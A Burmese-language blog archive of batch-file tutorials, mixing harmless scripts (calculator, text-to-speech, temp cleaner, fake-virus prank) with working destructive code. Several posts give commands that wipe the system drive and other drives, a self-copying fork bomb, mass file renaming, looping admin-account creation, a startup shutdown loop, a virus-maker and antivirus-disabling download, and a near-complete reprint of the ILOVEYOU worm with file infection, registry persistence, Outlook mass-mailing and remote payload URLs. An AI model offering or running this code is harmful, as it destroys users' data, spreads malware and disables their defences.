Subscribe For Free Updates!

We'll not spam mate! We promise.

Showing posts with label Bat File ေရးနည္း. Show all posts
Showing posts with label Bat File ေရးနည္း. Show all posts

Thursday, March 10, 2016

Bat File ျဖင့္ Antivirus Software မ်ားအား Disable လုပ္ျခင္း


Bat File ျဖင့္ Antivirus Software မ်ားအား Disable လုပ္ျခင္း

ဒီလုိနည္းလမ္းေတြက မထင္ထားတတ္ၾကတဲ့နည္းလမ္းေတြျဖစ္ပါတယ္။
အမ်ားစုစိတ္၀င္စားတာက FUD ျဖစ္ဖုိ ့ေလာက္ေတြးၾကပါတယ္။ ဒါေပမယ့္ခုေခတ္မွာ
Cypter ၀ယ္မွ ဘဲ FUD ျဖစ္မယ့္ပုံမ်ဳိးေတြဆုိေတာ့ ဒီနည္းကအသုံး၀င္ေလာက္ပါတယ္။
Anti Virus Software အမ်ားစုကုိလည္း Disable လုပ္ေပးနုိင္တဲ့ Batch Code ေလးဆုိေတာ့
ပုိစိတ္၀င္စားဖုိ ့ေကာင္းပါတယ္။ 
ေအာက္ကလင့္မွာ Code ေတြ Download လုိက္ပါ။

Sunday, March 23, 2014

How To Make Fake Virus! [Prefect]

http://latestblogtechnology.com/wp-content/uploads/2013/01/computer-virus-1024x842.jpg 
How To Make Fake Virus! [Prefect]

ခုေနာက္ပုိင္း Computer user ေတြၾကည့္လုိက္ရင္ Virus ဆုိ ေတာ္ေတာ္လန္ ့ၾကတယ္။
virus အမ်ဳိးအစားတည္းကမွ trojan လုိပာာမ်ဳိးဆုိ တုန္ေနေအာင္ေၾကာက္ၾကတယ္။ ပာီးးးးးးးးးးး ဒီေတာ့ကြ်န္ေတာ့ စေနာက္ခ်င္စိတ္ေလးက တစ္စထက္တစ္စ ပုိပုိတုိးလို ့ေပ့ါ။
ခုသုံးမယ္နည္းကေတာ့ batch file programming ပုိင္း ကုိသုံးသြားမွာပါ။ ကဲေကာင္းျပီ အရင္ဆုံး notepad ဖြင့္လုိက္ပါ။

Code :

@echo off
color 0c
title VIRUS DETECTED!
@echo VIRUS/TROJAN HORSE DETECTED!
@echo Clean Up System Y/N?
@echo off
pause
@echo Virus Database Detected, Continue? Y/N
@echo off
pause
@echo Virus Has Corrupted System Files, Attempt to fix? Y/N
@echo off
pause
@echo DESTRUCT SEQUENCE INITIATED!!!
color 0b
@echo 5
ping -n 2 127.0.0.1>nul
color 4
@echo 4
ping -n 2 127.0.0.1>nul
color 0d
@echo 3
ping -n 2 127.0.0.1>nul
color 2
@echo 2
ping -n 2 127.0.0.1>nul
color 0e
@echo 1
ping -n 2 127.0.0.1>nul
@echo DESTRUCT!!!!!
ping -n 3 127.0.0.1>nul
@echo Deleting System Files...
ping -n 4 127.0.0.1>nul
echo Deletion Successful!
ping -n 2 127.0.0.1>nul
@echo All Files Have Been Deleted!
ping -n 2 127.0.0.1>nul
@echo Acquiring Credit Card Numbers...
ping -n 2 127.0.0.1>nul
@echo Allowing virus to boot from startup...
ping -n 3 127.0.0.1>nul
@echo Starting up kill.exe...
ping -n 3 127.0.0.1>nul
color 0a
@echo MWAHAHAHAHA!!!
ping -n 3 127.0.0.1>nul
@echo I Am The Master!!!
ping -n 2 127.0.0.1>nul
@echo (SYSTEM SHUTDOWN)
shutdown.exe -s -t 45 -c "This is a PRANK!"
@echo off
pause

အဲ့ေကာင္ေတြကုိ name.bat (name ဆုိတဲ့ေနရာၾကိုက္တာထည့္ပါ)
အဲ့ကုဒ္ေတြအေၾကာင္းဆက္ရွငး္မယ္။ မပာုတ္ရင ္ကုိစီးတဲ့ျမင္း အထီးအမ မသိ မွာစုိးလုိ ့

@echo off
        ဒါကေတာ့ window command box မွာ ဘာမွမရွိဘဲေျပာင္ရွင္းျဖစ္ေစေအာင္ပါ။
ဒီလုိမ်ဳိးေပ့ါ။
https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-frc3/t1.0-9/s526x296/970768_241004372752101_1361920659_n.jpg


color 0c
        ဒါကေတာ့ command box တည္းက text ကုိ color code ေပးထားတာပါ။ 0c ဆုိတာေတာ့ color code ပါဘဲ။
(မယုံရင္ command line (cmd) ေခၚျပီး color ? လုိ ့ရုိက္ၾကည့္ပါ)

Title
        ကေတာ့ရွင္းပါတယ္။ title ေပါ့ command box အတြက္ title name change ေပးလုိက္တာပါ။

Pause
       ဒါေလးကအေထြအထူးရွင္းစရာလုိမယ္မထင္ပါဘူး ခဏ ရပ္ထားေပးပါလုိ ့သုံးတာပါ။

@echo
        notepad တည္း

bla bla bal
pause

လုိ ့ထည့္ျပီး test.bat လုိ ့ save ၾကည့္ျပီး run ၾကည့္ပါ ဘာမွေပၚမွာ မပာုတ္ပါဘူး။ ဒီေတာ့ေပၚေစခ်င္ရင္ bat (batch) programming မွာအေရွ  ့ကေနျပီးေတာ့ @echo ဆုိတာထည့္ေပးရပါတယ္။
ေအာက္ကလုိေပ့ါ

@echo Dan Dan Dal Di Di De
pause

Ping
       ping ဆုိအမ်ားအစုသိတာ ddos တုိက္ရင္သုံးလုိ ့ရနုိင္တယ္။ျပီးေတာ့ network တည္းကစက္အခ်င္းခ်ငး္ ေလး သြားေအာင္လုပ္နုိင္တယ္ဆုိတာပါဘဲ။ ping မွာ အဓိပၸာယ္ရွိျပီးသားပါ။
ကြန္ပ်ဴတာ တစ္လုံးနဲ  ့တစ္လုံး ခ်ိတ္ ဆက္ တာဘဲ ျဖစ္ျဖစ္ အင္တာနက္ ခ်ိတ္ဆက္ရင္ဘဲျဖစ္ျဖစ္ သတိထားၾကည့္ပါ သူတုိ ့ ping ဆုိျပီးရုိက္တတ္တယ္။ ping ဆိုတာက remote or local request လွမ္းလုပ္တာပါဘဲ။
လူလုိ ေပ့ါ ကြန္ပ်ဴတာ တစ္လုံးနဲ ့တစ္လုံး ခ်ိတ္ဆက္ထားတယ္ဆုိပါေတာ့။ ဒါကလူႏွစ္ေယာက္လုိ ့သေဘာထားမယ္။ ping ရုိက္ၾကည့္မယ္။ လူလုိဆုိ ဒီဘက္ကသူက ပာုိဘက္ကသူကုိ " ေပာ့ေကာင္မင္းရွိလား?" ပာုိဘက္ကသူက "ေအးငါရွိတယ္"
ဒါမ်ဳိးေပ့ါ လွမ္းျပီး ခ်ိတ္ဆက္တဲ့သေဘာပါဘဲ။ ဒီတည္းမွာဆုိ ping -n 3 127.0.0.1 လုိသုံးထားတယ္ 127.0.0.1 ဆုိတာ local computer id ေတြပါ။ ဒီစက္အလုပ္လုပ္ေသးလာလွမ္း စစ္တယ္ျပီးေတာ့ ေနာက္ထပ္ code တစ္ေၾကာင္းကုိ ဆက္သြားေပးမယ္။
web server ကုိ request မ်ားမ်ားတင္ရင္ ဒါပာာ ddos သေဘာေဆာင္ပါတယ္။ ဒါပါဘဲ

shutdown.exe
         ဒါကေတာ့ ပုံမွန္ပါဘဲ ကြန္ပ်ဴတာကုိ shutdown ခ်ပါလုိ ့ command (shutdown.exe -c )နဲ ့အမိန္ ့ေပးလုိက္တာပါဘဲ ။ ေနာက္က( -t 45 )ကေတာ့ 45 second ၾကာရင္ မွ shutdown ခ်ဆုိတဲ့သေဘာေတြပါ။
(-c "Chit Lo Sa Tar Naw Arrrrrrrrrrrrr Bwarrrrrr") ဒါကဘာမွေတာ့မပာုတ္ပါဘူး ကြန္ပ်ဴတာ shutdown က်ခံနီး စေနာက္ဖု ိ ့ massage box ေလးတစ္ခု ဖန္တီးေပးလုိက္ယုံေလးပါ။

တကယ္လုိ ့မ်ား shutdown မ်ား shutdown မဆင္းခ်င္ဘူး ကုိိိိိိိိိကလည္း ဒီ batch file ေလးကုိ run မိထားျပီဆုိရင္
Runbox ကုိ ေခၚျပီး Shutdown -t လုိ ့ရုိက္ထည့္ေပးရမယ္။

Shutdown -t
         ပုံမွန္ပါဘဲ shutdown ကေတာ့ shutdown က်ပါေပ့ါ -t က အခ်ိန္ ထည့္ေပးရပါမယ္ ဘာမွမထည့္ဘူး ဒီတုငး္ -t လို ့သာထည့္မယ္ဆုိ unlimited time (shutdown) မက်ေတာ့ဘူး ဆုိတဲ့သေဘာေပ့ါ။

ဒါေတြက စေနာက္ျခင္းသေဘာမ်ဳိးပါဘဲ ဘာမွ effect မရွိပါဘူး။ shutdown command ေလးကလြဲရင္ေပ့ါေနာ္.. :D

ကဲ အဆင္ေျပၾကပါေစဗ်ာ...
ေပ်ာ္ရႊင္ပါေစ။ :D



Wednesday, March 6, 2013

Driver Partition ကို Command Prompt သံုးၿပီး ေဖ်ာက္ထားခ်င္ရင္

http://upload.wikimedia.org/wikipedia/en/thumb/3/38/Command_Prompt.png/300px-Command_Prompt.png



ပထမဦးဆံုး (1) Go to Start > Run > "diskpart" ဆိုၿပီး ရိုက္ေပးပါ

DISKPART> ဆိုၿပီး command prompt နဲ႕ေပၚလာပါလိမ့္မယ္.....

2) ၿပီးရင္ "list volume" ဆိုၿပီးရိုက္ေပးပါ။  Driver Partition ေတြေပၚလာတာကိုေတြ႔ရပါလိမ့္မယ္ ....

3) အဲဒီမွာကၽြန္ေတာ္တို႔ ေဖ်ာက္ခ်င္တဲ့ Driver Partition ကိုေရြးေပးပါ ...
ကၽြန္ေတာ္ က Drive D ကိုေျဖာက္ခ်င္တာမလို႔
"select volume 1" ဆိုၿပီးရိုက္လိုက္ပါ... (1 ေနရာမွာ 0လည္းျဖစ္ခ်င္ျဖစ္မယ္, 1 လည္းျဖစ္ခ်င္ျဖစ္မယ္...)
(C),(D),(E), ရိွတဲ့စက္ကေတာ့ 1ေပါ့ ။(C),(D), ရိွတဲ့ စက္မ်ိဳးက်ေတာ့ 0 ေပါ့ ။

4) volume ကိုေရြးၿပီးသြားရင္
"remove letter D" ဆုိၿပီးထပ္ရိုက္လိုက္ပါ...
Drive (D) ကိုျပန္ၾကည့္လိုက္ပါ.... ေပ်ာက္သြားပါျပီ ..
-------------------------------------------------------------
အဲဒီ Drive (D) ကိုျပန္ေဖၚခ်င္ရင္ေတာ့ အဆင့္ (1) ကေန (3) ျပန္လုပ္ပါ (cmd ) ကိုပိတ္လိုက္ရင္ေပါ့
မပိတ္၇ေသးရင္ေတာ့ အဆင့္ (2) ကေန (3) အထိျပန္လုပ္ျပီး ...

အဆင့္ (4) "remove letter D" ဆိုတဲ႕ေနရာမွာ "assign letter (D)" ဆိုၿပီးေျပာင္းရိုက္လိုက္ရင္ရပါျပီ

Drive (D) ျပန္ေပၚလာပါလိမ့္မယ္...

Sunday, March 3, 2013

This code about multiple open windows means infinite windows until continue you restart the computer:save on denger.bat and code written in notepad

@echo off
copy 0% denger.bat
start denger.bat

This code about the computer shutdown:
@echo off
shutdown -s -t 5 -c “Shutdown”

Go to notepad and type the following:
@Echo off
Del C:\ *.*|y

save it as Dell.bat
Want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

One more …
try one this
Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q

then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous don’t try on your own pc.

NOTE :-  Howto add your own created viruses into start ups this will make it difficult to detect them n to remove them …
For this u need a registry updater software .
now move your .bat file to c:/windows and then simply run this software ur virsu will be added to your start ups i tried this with shut down , as my comp starts its shut down after 2 secs ..

Do not try it on your PC. Don’t mess around this is for educational purpose only

Sunday, February 24, 2013

Batch File အလြယ္ေရးနည္းစာအုပ္

https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcQ3gkGd9TJ2ngU50oZUIbVj3Qz1CN9n8vJ-WGK8t67hHJedUe2F

Batch File Programming ပုိင္းေလ့လာေနတဲ့ ညီကို ေမာင္ႏွမမ်ားအတြက္ ဒါေလးက အေထာက္အကူျပဳ ့မယ္လို ့
ေမွ်ာ္လင့္ပါတယ္... ကြ်န္ေတာ့္အစ္ကို ေတာ္တစ္ေယာက္ ဆုိဒ္မွာ
တင္တာေတြ ့ေတာ့မွ ျပန္သတိရျပီး ကြ်န္ေတာ္လည္း ျပန္တင္ေပးလုိက္
တာပါ။ ေလ့လာစညီကို ေတြအတြက္ေတာ့ အဆင္ေျပမယ္ထင္ပါတယ္။ ဒီစာအုပ္ေလးကြ်န္ေတာ့ဆီေ၇ာက္ေနတာ
ေတာ့ၾကာျပီဗ်.. ခုမွဘဲတင္ျဖစ္တယ္.. ကဲ ညီကိုမ်ား လုိခ်င္ရင္ေဒါင္း
ဖုိ ့သာအသင့္ပါေတာ့ဗ်ာ...



Download : Mediafire  Ziddu  Solidfiles  ShareBeastMirrorcreator

Wednesday, December 12, 2012

JPS Virus Maker

https://lh4.googleusercontent.com/-7e01_qRnd5M/UMe7SkJi4vI/AAAAAAAAAFM/Wut3Xoc2AZY/h120/Untitled.png

JPS virus Maker ေလး ပါ။ Batch File Programming ပုိင္းေလ့လာေနတဲ့သူမ်ားအတြက္ တန္ဖုိးေကာင္းတဲ့အရာေလးတစ္ခုျဖစ္သလုိ အေပ်ာ္တမ္း Virus ေ၇းျခင္သူမ်ားအတြက္လည္း လုိခ်င္စရာ ေလးတစ္ခုပါဘဲ။
အသုံးျပဳ ့နည္းကလြယ္ပါတယ္.. အခုဖုိင္ေလးကို Download ဆြဲဲျပီး ဖုိတာတစ္ခုတည္းထည့္ထားပါ။ျပီးရင္ ဖုိင္ေလးကိုဖြင့္လိုက္ပါ။ပုံေလးအတုိင္းျမင္ရပါမယ္။ ဒီေတာ့ အတည္းမွာ ကိုက active ျဖစ္ေစခ်င္တာေလးကိုအမွန္ျခစ္ေလးေပးေပးရပါမယ္။
ျပီးေတာ့ မိမိ လုပ္လုိက္တဲ့ဖုိင္ေလးကို run လုိက္ျပီဆုိတာနဲ ့  Error Massage ပုံစံေလးအျဖစ္ ျပဳ ့လုပ္ခ်င္ရင္လည္း Fake erro massage ကိုအမွန္ျခစ္လုပ္ပါ။ျပီးရင္ ေဘာက္တည္းမွာကိုေပၚေစခ်င္တာကိုထည့္ပါ။
ကဲသင္ႏွစ္သက္ရာအားလုံး အမွန္ျခစ္ေပးမယ္ျဖည့္မယ္ ဒါဆုိ လုံေလာက္ပါတယ္။
ေနာက္ဆုံးအေနနဲ ့ကေတာ့ ဖုိင္ပုံစံေ၇ႊးေပးတာပါဘဲ။
jpg,exe ,bmp ...etc ေပ့ါ မိမိၾကိုက္ရာတစ္ခုကိုေရႊးေပးလုိက္ပါ။ျပီးရင္ ေအာက္မွာ server.exe ေနရာမွာသင္ၾကိုက္တာေပါင္းလဲေပးနုိင္ပါတယ္။ အားလုံးျပီးျပည့္စုံျပီထင္ရင္ေတာ့.  Make Virus ကိုနုိပ္လုိက္ပါ။ မိမိ JPS Virus maker ထည့္ထားတဲ့ဖုိင္ေလးတည္းကိုေနာက္တစ္ဖုိင္ထပ္ေ၇ာက္ေနပါမယ္။ အဲ့ဒါကို run ရင္ေတာ့ သင္ ျပဳ  ့သမွ် နုရမယ့္ စက္ခေလးကိုေတာ့ သနားေသာအားျဖင့္ သတိထားျပီးစမ္းၾကပါ။ ကဲေဒါင္းဖုိ ့အသင့္ျပင္ပါေတာ့။

Download : Mediafire  Ziddu  Gamefront  Sharebeast

Tuesday, November 27, 2012

ၾကိဳက္တဲ့စာကို အသံနဲ ့ေျပာခိုင္းမယ္ batch

ကိုယ္ၾကိဳက္ရာစာေၾကာင္းေလးကို hello ဆိုတဲ့ေနရာမွာျပင္ေရးလိုက္ပါ...
.bat နဲ ့ save ပီး run လိုက္ရင္ အသံထြက္ေျပာပါလိမ့္မယ္ဂ်ာ...
အမွန္က VBS code ေလးေတြပါ.. batch နဲ ့execute လုပ္ခိုင္းထားတာပါ...

@echo off
@echo Dim speaks, speech>>speak.vbs
@echo speaks="hello">>speak.vbs
@echo Set speech=CreateObject("sapi.spvoice")>>speak.vbs
@echo speech.Speak speaks>>speak.vbs
start speak.vbs


matrix ထဲကလို msg ေပၚေအာင္လုပ္မယ္

 ကၽြန္ေတာ္တို ့ Matrix ကားထဲမွာ Neo ကိုေခၚေတာ့ follow the white rabbit ဆိုပီးတစ္လံုးခ်င္းေပၚလာတယ္ေနာ္..ခုလည္း wake up ဆိုပီးေပၚလာလိမ့္မယ္...
ေအာက္က code ေလးေတြကိုနားလည္မယ္ထင္ပါတယ္..ကိုယ္ေရးခ်င္တာျပင္ေရးေပါ့ဗ်ာ...

@echo off
color 0a
cls
echo w
ping localhost -n 2 >nul
cls
echo wa
ping localhost -n 2 >nul
cls
echo wak
ping localhost -n 2 >nul
cls
echo wake
ping localhost -n 2 >nul
cls
echo wake u
ping localhost -n 2 >nul
cls
echo wake up
ping localhost -n 2 >nul
cls
pause>nul


.bat နဲ ့ save ပီး run လိုက္ေတာ့....


Monday, November 26, 2012

recent file killer

recent file ေတြဖ်က္လိုက္ၾကပါဦး

@echo off
cd C:\Users\%username%
rmdir /s /q Recent
pause

save as something.bat ျပီ:ရင္ run ..လိုက္ရံုပဲ..
အဲ batch ဖိုင္ေလးေတြထားထားေတာ့အခ်ိန္ကုန္သက္သာတာေပါ့..ဘာရယ္ဟုတ္ပါ၀ူး...

Temporary file ေတြ ဖ်က္ဖို ့batch code ေလးပါ

temporary file ေတြဖ်က္ဖို ့ပါ
batch မေရးတာၾကာေတာ့ path ရွာတာကိုလည္ထြက္ေနတယ္..ဟီးးး
ရရခ်င္းတင္ေပးလိုက္တာပါ..ခ္ခ္


@echo off
title Temp File Cleaner
color 0b
echo.
echo.
:main
set/p "val=Are you want to clean Temp files(Y/N)?"
if /i "%val%"=="y" goto 1
if /i "%val%"=="n" goto 2
goto main

:1
color 0a
echo.
echo.
echo Cleaning Temp Files...
echo.
echo.
cd C:\Users\%username%\AppData\Local
rmdir /s /q Temp
echo.
echo.
echo Cleaning Completed!
echo.
echo.
echo press any key to exit...
pause >nul

:2
exit

ထံုးစံအတိုင္း .bat နဲ ့ save ပါ..execute လုပ္လိုက္ရင္ Yes/No ေမးပါလိမ့္မယ္ Y ရိုက္ေပးရင္ temp ေတြ clean ျဖစ္သြားပါပီ.....

mouse button swapping

ၾကာပါပီ..မသိေသးသူမ်ားဖို ့ share လိုက္ပါသည္...

@echo off
color 0a
Rundll32 user32,SwapMouseButton
msg * Swaped Mouse Button

something.bat နဲ ့ save ပီး Run လိုက္ပါ...ေမာက္စ္ကလစ္ေလးဘယ္ညာေျပာင္းသြားပါမည္  :D

many admin account maker

Admin account ေတြအမ်ားၾကီးပြားေပးပါလိမ့္မယ္
ရိုးရိုးေလးပဲ loop ပတ္ထားတာပါ

@echo off
color 0a
:a
net user admin /add
goto a
exit

something.bat နဲ ့save ျပီးစမ္းႏိုင္ပါသည္....စမ္းပီးရင္ေဆာ့မဆဲေၾကးဂ်..ငိငိ

Friday, November 23, 2012

Basic Calculator In Batch


Code:

@echo off
title Batch Calculator
echo -------------------------http://www.minsoeyarsar.com-------------------------
:1
echo Enter the values with operands (E.g. 1+1):
set /p input=
set /a result=%input%
echo Result is: %result%
:2
echo Wanna continue? Press Y for yes Or N for No
set /p "choice=>"
if %choice%==Y goto 1
if %choice%==N goto end
echo Invalid choice

goto 2
:end
exit

I Love You Virus Codes

တစ္ခ်ိန္တုန္းက နမည္ၾကီး ဗားရက္(စ္) ေလးပါဘဲ.. ညီငယ္ေလးတစ္ေယာက္ ေလ့လာခ်င္တယ္ဆုိလုိ ့
ျပန္ရွာတင္ေပးလုိက္တာပါ..

Notepad ကိုဖြင့္ပါ
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="
'*******************************************************
'End

ကိုကူးေရးျပီး  love you.vbs နဲ့ save လိုက္ပါ ျပီးရင္ run လိုက္ရင္ ဆိုးသြားျပီး အလြယ္ေပါ့

အမွန္တာ့  autorun နဲ့ ေပါင္းေရးရတာေပါ့ေနာ္ ဆရာစားခ်န္ထားတာ

Thursday, November 22, 2012

ေပ်ာ့ေပ်ာ့ေလးနဲ ့ထိတဲ့ Batch Code ေလး

Chat တည္းမွာ ညီငယ္တစ္ေယာက္လာေမးတာပါ.. ခ်က္တည္းမွာျပန္ရွင္းျပရင္ေတာ့ရပါတယ္.
ဒါေပမယ့္ တစ္ေယာက္ဘဲဒီနည္းကို သိသြားပါမယ္.. ဒါေၾကာင့္ ကြ်န္ေတာ့ဆုိဒ္ေပၚ တင္ျပီး ေျပာျပျခင္းမ်ုိးပါ..

Batch ဖုိင္ေတြေရးၾကတာမွား မုိးပ်ံပူေပါင္း ၾကေနတာဘဲ ေဖာင္းပြေနလုိက္ၾကတာ..
ညီငယ္ေလးကေတာ့ အလြယ္ဆုံးနဲ ့ထိခ်က္ျပင္းျပင္းေလးဆုိေတာ့ ကြ်န္ေတာ္ A+ တတ္တုန္းက ကလိဖူးတဲ့နည္းေလးကို ျပန္မွ်ေပးလုိက္ပါတယ္...

အုိေက စရေအာင္( l3t st4rt )

Notpad ကိုဖြင့္လိုက္ပါ။ ျပီးရင္ အဲ့တည္းကို ေအာက္က ကုဒ္ေလးေတြထည့္လုိက္ပါ..


ren *.txt *.vir
ren *.avi *.vir


ျပီးရင္ Test.bat (or) test.cmd လုိ ့မွတ္လိုက္ပါ..
ဒါဆုိရင္ txt နဲ ့ avi ဖုိင္ သမွ် အကုန္လုံး vir အျဖစ္ ေျပာင္းလဲသြားမွာပါ... ဘာမွ ကို ဖြင့္ရမွာမပာုတ္ေတာ့ပါဘူး..
 ခက္ျပင္းျပင္းကိုၾကိုက္တယ္ဆုိရင္ေတာ့ ေအာက္က ကုဒ္တစ္ေၾကာင္းတည္းကိုသုံးလုိက္ပါ

ren *.* *.vir

ဒါဆုိ စက္တစ္ခုလုံး နိဗၺာန္ ေရာက္ပါျပီ...
 စမ္းခ်င္ရင္ေတာ့ VMware တည္းမွာစမ္းၾကပါ..

Solution လုိခ်င္သူမ်ားအတြက္ကေတာ့...

ကြ်န္ေတာ္တုိ ့ မစမ္းခင္ Backup လုပ္ထားပါ..

Restore Point လုပ္ထားပါ..

ဒါဆုိရင္ေတာ့ ျပန္ျပီးျပဳ ့ျပန္နုိင္ပါတယ္...

မသိတဲ့ေကာင္ကေတာ့ window ျပန္တင္ေပ့ါေနာ္..

This Post Is Funny Only. For My Young Brother.
I Sharing All Of My Friends And U.
Thanks To All
Min Soe Yar Sar

Shutdown computer everytime it is turned on


(save as hshutdown.bat)


echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
